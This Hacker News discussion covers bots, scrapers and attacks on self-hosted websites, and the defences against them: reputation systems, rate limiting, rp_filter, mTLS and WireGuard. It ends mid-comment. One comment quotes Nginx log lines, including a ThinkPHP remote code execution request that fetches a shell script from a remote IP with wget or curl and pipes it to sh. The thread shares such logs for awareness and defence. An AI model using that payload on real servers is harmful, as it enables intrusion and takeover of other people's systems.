[HN Gopher] The internet is no longer a safe haven
___________________________________________________________________
The internet is no longer a safe haven
Author : akyuu
Score : 218 points
Date : 2025-11-16 13:12 UTC (9 hours ago)
(HTM) web link (brainbaking.com)
(TXT) w3m dump (brainbaking.com)
| BinaryIgor wrote:
| I wonder why is it that we get an increase in these automated
| scrapers and attacks as of late (some few years); is there better
| (open-source?) technology that allows it? Is it because hosting
| infrastructure is cheaper also for the attackers? Both? Something
| else?
|
| Maybe the long-term solution for such attacks is to hide most of
| the internet behind some kind of Proof of Work system/network, so
| that mostly humans get to access to our websites, not machines.
| trenchpilgrim wrote:
| Using AI you can write a naive scraper in minutes and there's
| now a market demand for cleaned up and structured data.
| marginalia_nu wrote:
| What's missing is effective international law enforcement. This
| is a legal problem first and foremost. As long as it's as easy
| as it is to get away with this stuff by just routing the
| traffic through a Russian or Singaporean node, it's going to
| keep happening. With international diplomacy going the way it
| has been, odds of that changing aren't fantastic.
|
| The web is really stuck between a rock and a hard place when it
| comes to this. Proof of work helps website owners, but makes
| life harder for all discovery tools and search engines.
|
| An independent standard for request signing and building some
| sort of reputation database for verified crawlers could be part
| of a solution, though that causes problems with websites
| feeding crawlers different content than users, an does nothing
| to fix the Sybil attack problem.
| luckylion wrote:
| It's not necessarily going through a Russian or Singaporean
| node though, on the sites I'm responsible for, AWS, GCP,
| Azure are in the top 5 for attackers. It's just that they
| don't care _at all_ about that happening.
|
| I don't think you need world-wide law-enforcement, it'll be a
| big step ahead if you make owners & operators liable. You can
| limit exposure so nobody gets absolutely ruined, but anyone
| running wordpress 4.2 and getting their VPS abused for
| attacks currently has 0 incentive to change anything unless
| their website goes down. Give them a penalty of a few hundred
| dollars and suddenly they do. To keep things simple, collect
| from the hosters, they can then charge their customers, and
| suddenly they'll be interested in it as well, because they
| don't want to deal with that.
|
| The criminals are not held liable, and neither are their
| enablers. There's very little chance anything will change
| that way.
| mrweasel wrote:
| The big cloud provides needs to step up and take
| responsibility. I understand that it can't be to easy to
| do, but we really do need a way to contact e.g. AWS and
| tell them to shut of a costumer. I have no problem with
| someone scraping our websites, but I care that they don't
| do so responsibly, slow down when we start responding
| slower, don't assume that you can just go full throttle,
| crash our site, wait, and then do it again once we start
| responding again.
|
| You're absolutely right: AWS, GCP, Azure and others, they
| do not care and especially AWS and GCP are massive
| enablers.
| ctoth wrote:
| > we really do need a way to contact e.g. AWS and tell
| them to shut of a costumer.
|
| You realize you just described the infrastructure for far
| worse abuse than a misconfigured scraper, right?
| mrweasel wrote:
| I'm very aware of that, yes. There needs to be a good
| process, the current situation where AWS simply does not
| care, or doesn't know also isn't particularly good. One
| solution could be for victims to notify AWS that a number
| of specified IP are generating an excessive amount of
| traffic. An operator could then verify with AWS traffic
| logs, notify the customer that they are causing issue and
| only after a failure to respond could the customer be
| shut down.
|
| You're not wrong that abuse would be a massive issue, but
| I'm on the other side of this and need Amazon to do
| something, anything.
| Aurornis wrote:
| > What's missing is effective international law enforcement.
|
| International law enforcement on the Internet would also
| subject you to the laws of other countries. It goes both
| ways.
|
| Having to comply with all of the speech laws and restrictions
| in other countries is not actually something you want.
| ocdtrekkie wrote:
| This is already kind of true with every global website, the
| idea of a single global internet is one of those fairy tale
| fantasy things, that maybe happened for a little bit before
| enough people used it. In many cases it isn't really ideal
| today.
| marginalia_nu wrote:
| We have historically solved this via treaties.
|
| If you want to trade with me, a country that exports
| software, let's agree to both criminalize software piracy.
|
| No reason why this can't be extended to DDoS attacks.
| beeflet wrote:
| I don't want governments to have this level of control
| over the internet. It seems like you are paving over a
| technological problem with the way the internet is
| designed by giving some institution a ton of power over
| the internet.
| marginalia_nu wrote:
| The alternative to governments stopping misbehavior is
| every website hiding behind Cloudflare or a small number
| of competitors, which is a situation that is far more
| susceptible to abuse than having a law that says you
| can't DDoS people even if you live in Singapore.
|
| It really can not be overstated how unsustainable the
| status quo is.
| armchairhacker wrote:
| I don't think this can solved legally without compromising
| anonymity. You can block unrecognized clients and punish the
| owners of clients that behave badly, but then, for example,
| an oppressive government can (physically) take over a
| subversive website and punish everyone who accesses it.
|
| Maybe pseudo-anonymity and "punishment" via reputation could
| work. Then an oppressive government with access to a
| subversive website (ignoring bad security, coordination with
| other hijacked sites, etc.) can only poison its clients'
| reputations, and (if reputation is tied to sites, who have
| their own reputations) only temporarily.
| ajuc wrote:
| > but then, for example, an oppressive government can
| (physically) take over a subversive website and punish
| everyone who accesses it.
|
| Already happens. Oppressive governments already punish
| people for visiting "wrong" websites. They already censor
| internet.
|
| There are no technological solutions to coordination
| problems. Ultimately, no matter what you invent, it's
| politics that will decide how it's used and by whom.
| BinaryIgor wrote:
| Good points; I would definitely vouch for an independent
| standard for request signing + some kind of decentralized
| reputation system. With international law enforcement, I
| think there could be too many political issues for it not
| become corrupt
| rkagerer wrote:
| _long-term solution_
|
| How about a reputation system?
|
| Attached to IP address is easiest to grok, but wouldn't work
| well since addresses lack affinity. OK, so we introduce an
| identifier that's persistent, and maybe a user can even port it
| between devices. Now it's bad for privacy. How about a way a
| client could prove their reputation is above some threshold
| without leaking any identifying information? And a
| decentralized way for the rest of the internet to influence
| their reputation (like when my server feels you're hammering
| it)?
|
| Do anti-DDoS intermediaries like Cloudflare basically catalog a
| spectrum of reputation at the ASN level (pushing anti-abuse
| onus to ISP's)?
|
| This is basically what happened to email/SMTP, for better or
| worse :-S.
| JimDabell wrote:
| Reputation plus privacy is probably unsolvable; the whole
| point of reputation is knowing what people are doing
| elsewhere. You don't need reputation, you need persistence.
| You don't need to know if they are behaving themselves
| elsewhere on the Internet as long as you can ban them once
| and not have them come back.
|
| Services need the ability to obtain an identifier that:
|
| - Belongs to exactly one real person.
|
| - That a person cannot own more than one of.
|
| - That is unique per-service.
|
| - That cannot be tied to a real-world identity.
|
| - That can be used by the person to optionally disclose
| attributes like whether they are an adult or not.
|
| Services generally don't care about knowing your exact
| identity but being able to ban a person and not have them
| simply register a new account, and being able to stop people
| from registering thousands of accounts would go a long way
| towards wiping out inauthentic and abusive behaviour.
|
| The ability to "reset" your identity is the underlying hole
| that enables a vast amount of abuse. It's possible to have
| persistent, pseudonymous access to the Internet without
| disclosing real-world identity. Being able to permanently ban
| abusers from a service would have a hugely positive effect on
| the Internet.
| jasonjayr wrote:
| A digital "Death penalty" is not a win for society, without
| considering a fair way to atone for "crimes against your
| digital identity".
|
| It would be way to easy for the current regime (whomever
| that happens to be) to criminalize random behaviors (Trans
| People? Atheists? Random nationality?) to ban their
| identity, and then they can't apply for jobs, get bus fare,
| purchase anything online, communicate with their lawyers,
| etc.
| JimDabell wrote:
| Describing _"I don't want to provide service to you and I
| should have the means of doing so"_ as a _"digital death
| penalty"_ is a tad hyperbolic, don't you think?
|
| > It would be way to easy for the current regime
| (whomever that happens to be) to criminalize random
| behaviors (Trans People? Atheists? Random nationality?)
| to ban their identity, and then they can't apply for
| jobs, get bus fare, purchase anything online, communicate
| with their lawyers, etc.
|
| Authoritarian regimes can already do that.
|
| I think perhaps you might've missed the fact that what I
| was suggesting was individual to each service:
|
| > Reputation plus privacy is probably unsolvable; the
| whole point of reputation is knowing what people are
| doing elsewhere. You don't need reputation, you need
| persistence. You don't need to know if they are behaving
| themselves elsewhere on the Internet as long as you can
| ban them once and not have them come back.
|
| I was saying _don't_ care about what people are doing
| elsewhere on the Internet. Just ban locally - but
| persistently.
| hombre_fatal wrote:
| If creating an identity has a cost, then why not allow
| people to own multiple identities? Might help on the
| privacy front and address the permadeath issue.
|
| Of course everything sounds plausible when speaking at such
| a high level.
| rkagerer wrote:
| I agree and think the ability to spin up new identities
| is crucial to any sort of successful reputation system
| (and reflects the realities of how both good and bad
| actors would use it). Think back to early internet when
| you wanted an identity in one community (e.g. forums
| about games you play) that was separate from another
| (e.g. banking). But it means those reputation identities
| need to take some investment (e.g. of time / contribution
| / whatever) to build, and can't become usefully trusted
| until reaching some threshold.
| nucleardog wrote:
| Yep, this is basically how I'd implement it if I needed
| to. Just tackle the problem in reverse here: Don't assume
| users are good and try and track which are bad, assume
| users are bad and track which are good.
|
| Look at the HN karma system--you start with limited
| features, and as you show yourself a good user, you get
| more features (and also trust/standing with the
| community). "Resetting" your identity only ever loses you
| something.
|
| Apply the same thing to a git host getting hammered or
| something--by default, users can't view the history
| online or something (can still clone), but as your
| identity establishes reputation (through positive
| interactions, or even just browsing in a non-bot-like
| manner), your reputation increases and you get rate-
| limited access or something.
|
| This is essentially where a lot of spam ended up--it used
| to be that your mail was deliverable until you acted
| poorly, then your reputation was bad and your
| deliverability went down. Now it more closely resembles
| this--your reputation is bad until you send enough good
| mail and take enough good actions (DKIM/SPF, etc) to show
| yourself as good.
|
| The issues really all stems from "resetting your identity
| gets you back in good standing". Once you take that out
| of the mix, you no longer need to worry much about
| limiting identities, tying them to the real world,
| ensuring they're persistent, or many of the other hard
| problems that come up.
| TylerE wrote:
| Because of course what this world needs is for the
| wealthy to have even more advantages over the normies.
| (Hint: If you're reading this, and think you're one of
| the wealthy ones, you aren't)
| lifty wrote:
| Zero knowledge proof constructs have the potential to solve
| these kind of privacy/reputation tradeoffs.
| gmuslera wrote:
| It's ironic to use reputation system for this.
|
| 20+ years ago there were mail blacklists that basically
| blocked residential IP blocks as there should not be servers
| trying to send normal mail from there. Now you must try the
| opposite, blacklist blocks where only servers and not end
| users can come from, as there is potentially bad behaved
| scrapers in all major clouds and server hosting platforms.
|
| But then there are residential proxies that pay end users to
| route requests from misbehaved companies, so that door is
| also a bad mitigation
| rkagerer wrote:
| It's interesting that along another axis, the inertia of
| the internet moved from a decentralized structure back
| toward something that resembles mainframes. I don't think
| those axes are orthogonal.
| hnthrowaway0315 wrote:
| I guess it is just because 1) They can, and 2) Everyone wants
| some data. I think it would be interesting if every website out
| there starts to push out BS pages just for scrappers. Not sure
| how much extra cost it's going to take if a website puts up say
| 50% BS pages that only scrappers can reach, or BS material with
| extremely small fonts hidden in regular pages that ordinary
| people cannot see.
| inerte wrote:
| Something like https://blog.cloudflare.com/ai-labyrinth/ ?
| Vegenoid wrote:
| I'm pretty sure it is the commercial demand for data from AI
| companies. It is certainly the popular conception among
| sysadmins that it is AI companies who are responsible for the
| wave of scrapers over the past few years, and I see no
| compelling alternative.
| embedding-shape wrote:
| > and I see no compelling alternative.
|
| Another potential cause: It's way easier for pretty much any
| person connected to the internet to "create" their own
| automation software by using LLMs. I could wager even the
| less smart LLMs could handle "Create a program that checks
| this website every second for any product updates on all
| pages" and give enough instructions for the average computer
| user to be able to run it without thinking or considering
| much.
|
| Multiply this by every person with access to an LLM who wants
| to "do X with website Y" and you'll get an magnitude increase
| in traffic across the internet. This been possible since
| what, 2023 sometime? Not sure if the patterns would line up,
| but just another guess for the cause(s).
| EGreg wrote:
| Why? It's because of AI. It enables attacks at scale. It
| enables more people to attack, who previously couldn't. And so
| on.
|
| It's very explainable. And somehow, like clockwork, there are
| always comments to say "there is nothing new, the Internet has
| always been like this since the 80s".
|
| You know, part of me wants to see AI proliferate into more and
| more areas, just so these people will finally wake up
| eventually and understand there is a huge difference when AI
| does it. When they are relentlessly bombarded with realistic
| phone calls from random numbers, with friends and family
| members calling about the latest hoax and deepfake, when their
| own specific reputation is constantly attacked and destroyed by
| 1000 cuts not just online but in their own trusted circles, and
| they have to put out fires and play whack-a-mole with an
| advanced persistent threat that only grows larger and always
| comes from new sources, anonymous and not.
|
| And this is all before bot swarms that can coordinate and plan
| long-term, targeting specific communities and individuals.
|
| And this is all before humanoid robots and drones proliferate.
|
| Just try to fast-forward to when human communities online and
| offline are constantly infiltrated by bots and drones and
| sleeper agents, playing nice for a long time and amassing karma
| / reputation / connections / trust / whatever until finally
| doing a coordinated attack.
|
| Honestly, people just don't seem to get it until it's too late.
| Same with ecosystem destruction -- tons of people keep
| strawmanning it as mere temperature shifts, even while
| ecosystems around the world get destroyed. Kelp forests.
| Rainforests. Coral reefs. Fish. Insects. And they're like "haha
| global warming by 3 degrees big deal. Temperature has always
| changed on the planet." (Sound familiar?)
|
| Look, I don't actually want any of this to happen. But if they
| could somehow experience the movie _It's a Wonderful Life_ or
| meet the _Ghost of Christmas Yet to Come_ , I'd wholeheartedly
| want every denier to have that experience. (In fact, a
| dedicated attacker can already give them a taste of this with
| current technology. I am sure it will become a decentralized
| service soon :-( )
| hshdhdhj4444 wrote:
| Our tech overlords understand AI, especially any form of AGI,
| will basically be the end of humanity. That's why they're
| entirely focused on being the first and amassing as much
| wealth in the meanwhile, giving up on any sort of
| consideration whether they're doing good for people or not.
| jchw wrote:
| Anubis is definitely playing the cat-and-mouse game to some
| extent, but I like what it does because it forces bots to either
| identify themselves as such or face challenges.
|
| That said, we can likely do better. Cloudflare does good in part
| because Cloudflare runs so much traffic, so they have a lot of
| data across the internet. Smaller operators just don't get enough
| traffic to really deal with banning abusive IPs without banning
| entire ranges indefinitely, not ideal. I hope to see a solution
| like Crowdsec where reputation data can be crowdsourced to block
| known bad bots (at least for a while since they are likely
| borrowing IPs) while using low complexity (potentially JS-free)
| challenges for IPs with no bad reputation. It's probably too much
| to ask for Anubis upstream which is probably already too busy
| dealing with the challenges of what it already does at the scale
| it is operating, but it does leave some room for further
| innovation for whoever wants to go for it.
|
| In my opinion there is at least no reason why it is not plausible
| to have a drop-in solution that can mostly resolve these problems
| and make it easier for hobbyists to run services again.
| gjsman-1000 wrote:
| The problem with anything, _anything_ , without a centralized
| authority, is that friction overwhelms inertia. Bad actors exist
| and have no mercy, while good people downplay them until it's too
| late. Entropy always wins. Misguided people assume the problem is
| _powerful people,_ when the problem is actually what the
| _powerful people use their authority to do_ , as powerful people
| will always exist. Accepting that and maintaining oversight is
| the historically successful norm; abolishing them has always
| failed.
|
| As such, I don't identify with the author of this post, about
| trying to resist CloudFlare for moral reasons. A decentralized
| system where everyone plays nice and mostly cooperates, does not
| exist any more than a country without a government where everyone
| plays nice and mostly cooperates. It's wishful thinking. We
| already tried this with Email, and we're back to gatekeepers.
| Pretending the web will be different is ahistorical.
| pixl97 wrote:
| The internet has made the world small and that's a problem.
| Nation states typically had a limited range of broadcasting
| their authority in the more distant past. A bad ruler couldn't
| rule the entire world, nor could they cause trouble with the
| entire world. From nukes to the interconnected web the worst of
| us with power can effect everyone else.
| martin-t wrote:
| Power is a spectrum. Power differentials will always exist but
| we can absolutely strive to make them smaller and smaller.
|
| 1) Most of the civilized world no longer has hereditary
| dictators (such as "kings"). Because they were removed from
| power by the people and the power was distributed among many
| individuals. It works because malicious (anti-social)
| individuals have trouble working together. And yes, oversight
| helps.
|
| But it's a spectrum and we absolutely can and should move the
| needle towards more oversight and more power distribution.
|
| 2) Corporate power structures are still authoritarian. We can
| change that too.
| time4tea wrote:
| Had to ban RU, CN, SG, and KR just cos of the volume of spam. The
| random referer headers has recently become a problem.
|
| This is particularly annoying as knowing where people come from
| is important.
|
| Its just another reason to give up making stuff, and give in to
| the FAANG and the AI enshittification.
|
| :-(
| mrweasel wrote:
| If you only care about regular users I'd advice banning all
| known datacenters, Browserbase, China and Brazil.
| worthless-trash wrote:
| I also banned the middle east, Logs actually reflected real
| users, cost dropped, and my mental health improved.
|
| Win Win.
| mrweasel wrote:
| If you know that you don't have customers or users in the
| area, or very few, then go for it.
|
| I worked in e-commerce previously, we reduce fraud to
| almost zero by banning non-local cards. It affected a few
| customers that had international credit cards, but not
| enough to justify dealing with the fraud. Sometimes you
| just need to limit your attack surface.
| mberning wrote:
| the internet is over. If we want to recapture the magic of the
| earlier times we are going to have to invent something new.
| fithisux wrote:
| going back to Gopher?
| itintheory wrote:
| Gopher still requires the Internet. I know it's pretty common
| to conflate "the Internet" with "the World Wide Web", but
| there are actually other protocols out there (like Gopher).
| fithisux wrote:
| I don't see a solution then.
| groundzeros2015 wrote:
| Why would that help?
| pixl97 wrote:
| There is no something new. Anything we invent will be able to
| be taken over by complex bots. Welcome to the futureshock where
| humans aren't at the top of their domain.
| 9rx wrote:
| The magical times in the past have always been marked with
| being able to be part of an "exclusive club" that takes
| something from nothing to changing the world.
|
| Because of the internet, magical times can never be had again.
| You can invent something new, but as soon as anyone finds out
| about it, everyone now finds out about it. The "exclusive club"
| period is no more.
| martin-t wrote:
| > magical times can never be had again
|
| Yes, they can. But we need to admit to ourselves that people
| are not equal. Not just in terms of skill but in terms of
| morality and quality of character. And that some people are
| best kept out.
|
| Corporations, being amoral, should also be kept out.
|
| ---
|
| The old internet was the way it was because of gate keeping -
| the people on it were selected through technical skill being
| required. Generally people who are builder types are more
| pro-social than redistributor types.
|
| Any time I've been in a community which felt good, it was
| full of people who enjoyed building stuff.
|
| Any time such a community died, it was because people who
| crave power and status took it over.
| dw_arthur wrote:
| Gatekeeping and exclusion are going to have to make a
| comeback if we want to have a thriving culture again.
| Sometimes people need to be told their art, taste, or
| morals are lacking.
| willis936 wrote:
| Third spaces and the free time to explore them?
|
| No no, that doesn't maximize shareholder value.
| renewiltord wrote:
| Haha, you could host on Gemini instead of HTTP. You'd simulate
| the old internet in that only enthusiasts would come!
| basscomm wrote:
| There's already an Interet2; do we need to invent Internet3?
| bpt3 wrote:
| The internet hasn't been a safe haven since the 80s, or maybe
| earlier (that was before my time, and it's never been one since I
| got online in the early 90s).
|
| The only real solution is to implement some sort of identity
| management system, but that has so many issues that make it a
| non-starter.
| lotsofpulp wrote:
| > The only real solution is to implement some sort of identity
| management system, but that has so many issues that make it a
| non-starter.
|
| Apple and Alphabet seem positioned to easily enable it.
|
| https://www.apple.com/newsroom/2025/11/apple-introduces-digi...
| JSR_FDED wrote:
| I don't get it. That link refers to Apple letting you put
| your passport and drivers license info in the wallet on your
| phone.
| Astronaut3315 wrote:
| Apple's Wallet app presents this feature as being for "age
| and identity verification in apps, online and in person".
| pixl97 wrote:
| Alphabet the company that bans people for opaque reasons with
| no recourse, good idea. Maybe tech should not be in charge of
| digital identification
| lotsofpulp wrote:
| The governments like it that way. They want banks and tech
| companies to be intermediaries that are more difficult to
| hold accountable, because they can just say "we didn't feel
| like doing business with this person".
| cosmicgadget wrote:
| Was it a safe haven or was it less safe but simply an
| unprofitable target?
| unreal37 wrote:
| Given that the World Wide Web was invented in 1989... are you
| saying that the Internet was safer when only FTP and Usenet
| existed?
| qwertox wrote:
| Since I moved my DNS records to Cloudflare (that is: nameserver
| is now the one from Cloudflare), I get tons of odd connections,
| most notably SYN packets to eihter 443 or 22, which never respond
| back after the SYN-ACK. They ping me once a second in average,
| distributing the IPs over a /24 network.
|
| I really don't understand why they do this, and it's mostly some
| shady origins, like vps game server hoster from Brazil and so on.
|
| I'm at the point where i capture all the traffic and looks for
| SYN packets, check the RDAP records for them to decide if I then
| drop the entire subnets of that organization, whitelisting things
| like Google.
|
| Digital Ocean is notoriously a source of bad traffic, they just
| don't care at all.
| kzemek wrote:
| These are spoofed packets for SYNACK reflection attacks. Your
| response traffic goes to the victim, and since network stacks
| are usually configured to retry SYNACK a few times, they also
| get amplification out of it
| sva_ wrote:
| > like vps game server hoster from Brazil and so on.
|
| Probably someone DDoSing a Minecraft server or something.
|
| People in games do this where they DDoS each other. You can get
| access to a DDoS panel for as little as $5 a month.
|
| Some providers allow for spoofing the src ip, that's how they
| do these reflection attacks. So you're not actually dropping
| the sender of these packets, but the victims.
|
| Consider turning reverse path filter to strict as a basic anti
| spoofing method and see if it helps
| net.ipv4.conf.all.rp_filter = 1
| net.ipv4.conf.default.rp_filter = 1
| qwertox wrote:
| Thanks, it never came to my mind.
| cute_boi wrote:
| I believe kernel should make this behavior as default.
| ranger_danger wrote:
| > Digital Ocean is notoriously a source of bad traffic, they
| just don't care at all.
|
| Why should it be an ISP's job to police what their users can
| and can't do? I _really_ don 't think you want service
| providers to start moderating things.
|
| Does your electricity company ban the use of red light bulbs?
| Would everyone be ok with such restrictions?
| selectodude wrote:
| No but your electricity company will absolutely rat you out
| if your electricity usage skyrockets and the police will pop
| by to see if you're running a grow op or something.
| esseph wrote:
| Not anymore (depending on the state, and not since LED grow
| lights).
| threeducks wrote:
| > Fail2ban was struggling to keep up: it ingests the Nginx
| access.log file to apply its rules but if the files keep on
| exploding... > [...] > But I don't want to fiddle
| with even more moving components and configuration
|
| You can configure nginx to do rate-limiting directly. Blog post
| with more details: https://blog.nginx.org/blog/rate-limiting-
| nginx
| embedding-shape wrote:
| > The internet is no longer a safe haven for software hobbyists
|
| Maybe I've just had bad luck, but since I started hosting my own
| websites back around 2005 or so, my servers have always been
| attacked basically from the moment they come online. Even more so
| when you attach any sort of DNS name to it, especially when you
| use TLS and the certificates, guessing because they end up in a
| big index that is easily accessible (the "transparency logs").
| Once you start sharing your website, it again triggers an
| avalanche of bad traffic, and the final boss is when you piss of
| some organization and (I'm assuming) they hire some bad actor to
| try to make you offline.
|
| Dealing with crawlers, bot nets, automation gone wrong, pissed of
| humans and so on have been almost a yearly thing for me since I
| started deploying stuff to the public internet. But again, maybe
| I've had bad luck? Hosted stuff across wide range of providers,
| and seems to happen across all of them.
| zwnow wrote:
| My first ever deployed project was breached on day 1 with my
| database dropped and a ransom note in there. Was a beginner
| mistake by me that allowed this, but it's pretty discouraging.
| Its not the internet that sucks, its people that suck.
| mattmaroon wrote:
| Well I guess at least on day 1 you didn't have much to lose!
| zwnow wrote:
| Its a personal blog so even if data was lost it would've
| been just posts that nobody reads. Certainly not worth the
| 0.00054 BTC they wanted
| timeinput wrote:
| more like a zero day on day zero.
| aftbit wrote:
| My stuff used to get popped daily. A janky PHP guestbook I
| wrote just to learn back in the early 2000s? No HTML injection
| protection & someone turned my site into spammy XSS hack within
| days. A WordPress installation I fell behind on patching?
| Turned into SEO spam in hours. A redis instance I was using
| just to learn some of their data structures that got
| accidentally exposed to the web? Used to root my computer and
| install a botnet RAT. This was all before 2020.
|
| I never felt this made the internet "unsafe". Instead, it just
| reminded me how I messed up. Every time, I learned how to do
| better, and I added more guardrails. I haven't gotten popped
| that obviously in a long time, but that's probably because I've
| acted to minimize my public surface area, used star-certs to
| avoid being in the cert logs, added basic auth whenever I can,
| and generally refused to _trust_ software that's exposed to the
| web. It's not unsafe if you take precautions, have backups, and
| are careful about what you install.
|
| If you want to see unsafe, look at how someone who doesn't
| understand tech tries to interact with it. Downloading any
| random driver or exe to fix a problem, installing apps when a
| website would do, giving Facebook or Tiktok all of their
| information and access without recognizing that just maybe
| these multi-billion-dollar companies who give away all of their
| services don't have your best interests in mind.
| BolexNOLA wrote:
| I really like how you take these situations and turn them
| into learning moments, but ultimately what you're describing
| still sounds like an incredibly hostile space. Like yeah
| everyone should be a defensive driver on the road, but we
| still acknowledge that other people need to follow the rules
| instead of forcing us to be defensive drivers all the time.
| zelphirkalt wrote:
| Hosting a WP with any amount of by script kiddies written
| third-party plugins without constant vigilance and keeping
| things up to date is a recipe for disaster. This makes it a
| job guarantee. Hapless people paying for someone to set up a
| hopelessly over-complicated WP setup, paying for lots of
| plugins, and constant upkeep. Basically, that ecosystem feeds
| an entire community of "web developers" by pushing badly
| written software, that then endlessly needs to be patched and
| maintained. Then the feature creep sets in and plugins stray
| from the path of doing one thing well, until even WP instance
| maintainers deem them too bloated and look for a simpler one.
| Then the cycle begins anew.
| fragmede wrote:
| The worst feeling I ever had was from exposing a samba share
| to the Internet in the 2000s and having that get popped and
| my dad's company getting hacked because of the service I set
| up for him.
| heresie-dabord wrote:
| > my servers have always been attacked
|
| I believe the correct verb is _monetised_.
| BinaryIgor wrote:
| I have very similar experience. In my Nginx logs, I see things
| like that on a regular basis:
|
| 79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET
| /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555
| "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm"
| "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
| (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" ...
| 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00
| \xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x
| 8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \x
| D0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x
| 88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-"
| 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00
| \xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x
| 13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE
| \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\
| x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"
|
| or:
|
| "192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/in
| dex.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_
| user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%
| 3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-
| %20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20h
| ttp%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301
| 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"
|
| These are just some examples, but they happen pretty much daily
| :(
| hdgvhicv wrote:
| I remember watching the code red signatures in my space logs on
| my desktop back in 2001
| NoboruWataya wrote:
| I have a personal domain that I have no reason to believe any
| other human visits. I selfhost a few services that only I use
| but that I expose to the internet so I can access them from
| anywhere conveniently and without having to expose my home
| network. Still I get a constant torrent of malicious traffic,
| just bots trying to exploit known vulnerabilities (loads of
| them are clearly targeting WordPress, for example, even though
| I have never used WordPress). And it has been that way for
| years. I remember the first time I read my access logs I had a
| heart attack, but it's just the way it is.
| timeinput wrote:
| and it has been that way for a long time. Hosting a service
| on the internet means some one is *constantly* knocking at
| your door. It would be unimaginable if every few 10-1000s of
| milliseconds someone was trying a key in my front door, but
| that's just what it is with an open port on the internet.
| sshine wrote:
| I recently provisioned a VPS for educational purposes. As
| part of teaching public/private network interfaces in
| Docker, and as a debug tool, I run netstat pretty easily
| on.
|
| Minutes after coming into existence, I have half a dozen
| connections to sshd from Chinese IP addresses.
|
| That teaches the use of SSH keys.
| toyg wrote:
| Just put sshd on a nonstandard port, and 95% of the
| traffic goes away. Vandals can't be bothered with port-
| scanning, probably because the risk of getting banned
| before the scan is even complete is too high.
|
| But I agree that keys are not optional anymore.
| esseph wrote:
| Fronting with ssh is not as secure as you could be.
|
| Wireguard, tailscale, etc instead, THEN use ssh keys
| (with password on them mind you, then you have 2fa -
| something you have, and something you know).
| mbreese wrote:
| I've often thought about writing a script to use those bot
| attacks as a bit of a honey pot. The idea would be if someone
| is viewing a site with a brand new SSL certificate, that it
| can't be legitimate traffic, so just block that ip/subnet
| outright at the firewall. Especially if they are looking for
| specific URLs like Wordpress installations. There are a few
| good actors that also hit sites quickly (ex: I've seen Bing
| indexing in that first wave of hits), but those are the
| exception.
|
| Sadly, like many people, I just deal with the traffic as
| opposed to getting around to actually writing a tool to block
| it.
| esseph wrote:
| You'd end up blocking a bunch of cloud provider IP ranges
| and one day in the near future, there's a good chance some
| SaaS or provider service doesn't work.
| aledalgrande wrote:
| For your use case have you thought about VPN into your local
| network, via e.g. a Synology box? It's pretty cool and easy
| to set up.
| UltraSane wrote:
| The public internet is a incredibly hostile infosec environment
| and you pretty much HAVE to block requests based on real time
| threat data like https://www.misp-project.org/feeds/
|
| It is fun to create honeypots for things like SSH and RDP and
| automatically block the source IPs
| fragmede wrote:
| The Internet is _not_ safe, and Let 's Encrypt shows us this.
| They're a great service, but the moment you put something on
| the Internet and then give it a SSL/TLS certificate, evil will
| hammer your site to trying to find a WordPress admin page.
| _the_inflator wrote:
| I can confirm.
|
| My then PageRank 6 Business Website got attacked non stop
| starting around the 2008.
|
| At this time my log files exploded as well: the Script Kiddies
| entered the arena.
|
| At the time the first tools leaked into the public to scan for
| IP ranges and check websites for certain attack vectors.
|
| I miss the era between Compuserve, AOL around 1995 till 2008.
|
| Web Rings, Technorati, fantastic Fan Sites before Wikipedia -
| wholesome.
|
| Term: Script Kiddies
| https://en.wikipedia.org/wiki/Script_kiddie
| esseph wrote:
| By 1995 most of the script kiddies I knew were also co-
| mingling with 0day authors and warez distributors.
| quaintdev wrote:
| I do not have a solution for blog like this but if you are self
| hosting I recommend enabling mTLS on your reverse proxy.
|
| I'm doing this for a dozen services hosted at home. The reverse
| proxy just drops the request if user does not present a
| certificate. My devices which can present cert can connect
| seamlessly. It's a one time setup but once done you can forget
| about it.
| SoftTalker wrote:
| That's fine if you're hosting stuff just for yourself but not
| really practical if you're hosting stuff you want others to be
| able to read, such as a blog.
| lukevp wrote:
| You can mTLS to CloudFlare too, if you're not one of the
| anti-CloudFlare people. Then all traffic drops besides
| traffic that passes thru CF and the mTLS handshake prevents
| bypassing CF.
| BehindTheMath wrote:
| You don't need mTLS for that. Just block all IPs beside for
| Cloudflare's ranges.
| bogwog wrote:
| Wireguard is much better. Not only is it easier to set
| up/maintain, it even works on Android and iOS. I used to use
| client authentication for my private git server, but getting
| client certs installed on every client browser or app was a
| pain in the ass, and not even possible for some mobile
| browsers.
|
| Today, my entire network of self hosted stuff exists in a
| personal wireguard VPN. My firewall blocks everything except
| the wireguard port (even SSH).
| cyp0633 wrote:
| My Gitea instance also encountered aggressive scraping some days
| ago, but with highly distributed IP & ASN & geolocation, each of
| which is well below the rate of a human visitor. I assume Anubis
